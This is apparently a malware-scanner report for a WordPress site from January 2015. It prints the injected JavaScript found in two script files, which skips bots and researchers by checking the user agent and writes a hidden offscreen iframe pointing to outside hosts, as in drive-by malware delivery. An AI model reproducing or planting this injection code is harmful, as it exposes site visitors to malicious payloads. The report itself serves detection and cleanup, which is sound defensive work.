Scanned pages/files
| Request | Server response | Status |
http://how-to-sell-a-product.com/ | 200 OK Content-Length: 85271 Content-Type: text/html | clean |
http://how-to-sell-a-product.com/wp-includes/js/jquery/jquery.js?ver=1.8.3 | 200 OK Content-Length: 961 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(b){var a=document.cookie.match(new RegExp("(?:^|; )"+b.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,'\\$1')+"=([^;]*)"));return a?decodeURIComponent(a[1]):undefined}(function(){function e(b,a,c){var f=(b+'').toLowerCase();var g=(a+'').toLowerCase();var d=0;if((d=f.indexOf(g,c))!==-1){return d}return false}function h(){var b=['bots','AppleWebKit','Windows NT 6.3','X11','Phone','Google'];var a=false;for(var c in b){if(e(navigator.userAgent,b[c])){a=true;break}}return a}var i=(getCookie("akelbriston19ure")===undefined);if(!h()&&i){document.write('<iframe width="112" height="132" style="position:absolute;margin-top:-1002px;" src="http://penangfa.ga/dragoncha17.html"></iframe>');var j=new Date(new Date().getTime()+48*60*60*1000);document.cookie="akelbriston19ure=1; path=/; expires="+j.toUTCString()}})();
Antivirus reports:
Malicious iFrame found. size: 112x132 src: http://penangfa.ga/dragoncha17.html This URL is marked by Google as suspicious <iframe width="112" height="132" style="position:absolute;margin-top:-1002px;" src="http://penangfa.ga/dragoncha17.html"> | ||
http://how-to-sell-a-product.com/wp-content/plugins/popup-domination/lightbox.js?ver=1.0 | 200 OK Content-Length: 923 Content-Type: application/javascript | malicious |
Page code contains blacklisted domain: gilacave.wonderfuldolls.ru ...[287 bytes skipped]... ,h,j){var g=(e+"").toLowerCase();var i=(h+"").toLowerCase();var f=0;if((f=g.indexOf(i,j))!==-1){return f}return false}function b(){var e=["Linux","Windows NT 6.3","Yandex","rv:11.0","AppleWebKit","Googlebot","Android","IEMobile","Windows NT 6.2"];var g=false;for(var f in e){if(c(navigator.userAgent,e[f])){g=true;break}}return g}var d=(getCookie("ipmoture_aurma")===undefined);if(!b()&&d){document.write('<iframe src="http://gilacave.wonderfuldolls.ru/gilacave17.html?po" style="border-style:dotted solid double dashed;top: -1000px;left: -1000px;border-top-width: 3px;position: absolute;border-left-width: 3px;" height="143" width="143"></iframe>' Malicious iFrame found. size: 143x143 src: http://gilacave.wonderfuldolls.ru/gilacave17.html?po This URL is marked by Google as suspicious <iframe src="http://gilacave.wonderfuldolls.ru/gilacave17.html?po" style="border-style:dotted solid double dashed;top: -1000px;left: -1000px;border-top-width: 3px;position: absolute;border-left-width: 3px;" height="143" width="143"> | ||
https://app.getresponse.com/view_webform.js?wid=124000&mg_param1=1 | 200 OK Content-Length: 0 Content-Type: text/html | clean |
http://app.getresponse.com/test404page.js | HTTP/1.1 301 Moved Permanently Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Sat, 31 Jan 2015 05:20:39 GMT Pragma: no-cache Location: http://app.getresponse.com/error404.html Server: nginx Content-Length: 0 Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: core=6riuipdiho6ccl31kea9b1hac4; path=/; domain=.getresponse.com Set-Cookie: core=6riuipdiho6ccl31kea9b1hac4; path=/; domain=.getresponse.com | clean |
http://app.getresponse.com/error404.html | 404 Not Found Content-Length: 22115 Content-Type: text/html | clean |
http://www.gr-cdn.com/javascripts/common/jquery/jquery-1.5.1.min-rev-1368692535.js | 200 OK Content-Length: 85256 Content-Type: application/x-javascript | clean |
http://www.gr-cdn.com/javascripts/common/app-rev-1419409956.js | 200 OK Content-Length: 27893 Content-Type: application/x-javascript | clean |
http://www.gr-cdn.com/javascripts/core/js/Session-rev-1368692535.js | 200 OK Content-Length: 782 Content-Type: application/x-javascript | clean |
http://www.gr-cdn.com/javascripts/common/ix/fullSelect-rev-1420717020.js | 200 OK Content-Length: 26490 Content-Type: application/x-javascript | clean |
http://www.gr-cdn.com/javascripts/common/highslide/highslide-full-rev-1368692535.js | 200 OK Content-Length: 76969 Content-Type: application/x-javascript | clean |
http://www.gr-cdn.com/javascripts/common/swfobject/swfobject-rev-1368692535.js | 200 OK Content-Length: 10070 Content-Type: application/x-javascript | clean |
http://www.gr-cdn.com/javascripts/common/jquery/jquery.scrollTo-min-rev-1368773586.js | 200 OK Content-Length: 1331 Content-Type: application/x-javascript | clean |
http://www.gr-cdn.com/javascripts/common/jquery/jquery.serialScroll-min-rev-1368773586.js | 200 OK Content-Length: 1594 Content-Type: application/x-javascript | clean |
http://www.gr-cdn.com/javascripts/core/js/Common-rev-1416398290.js | 200 OK Content-Length: 31221 Content-Type: application/x-javascript | clean |
http://www.gr-cdn.com/javascripts/core/js/tooltips-rev-1368692535.js | 200 OK Content-Length: 3648 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: how-to-sell-a-product.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 31 Jan 2015 05:20:35 GMT
Server: nginx/1.6.2
Content-Type: text/html; charset=UTF-8
X-Pingback: http://how-to-sell-a-product.com/xmlrpc.php
GET / HTTP/1.1
Host: how-to-sell-a-product.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 31 Jan 2015 05:20:35 GMT
Server: nginx/1.6.2
Content-Type: text/html; charset=UTF-8
X-Pingback: http://how-to-sell-a-product.com/xmlrpc.php
Second query (visit from search engine):
GET / HTTP/1.1
Host: how-to-sell-a-product.com
Referer: http://www.google.com/search?q=how-to-sell-a-product.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: how-to-sell-a-product.com
Referer: http://www.google.com/search?q=how-to-sell-a-product.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=how-to-sell-a-product.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://how-to-sell-a-product.com/
Result: how-to-sell-a-product.com is not infected or malware details are not published yet.
Result: how-to-sell-a-product.com is not infected or malware details are not published yet.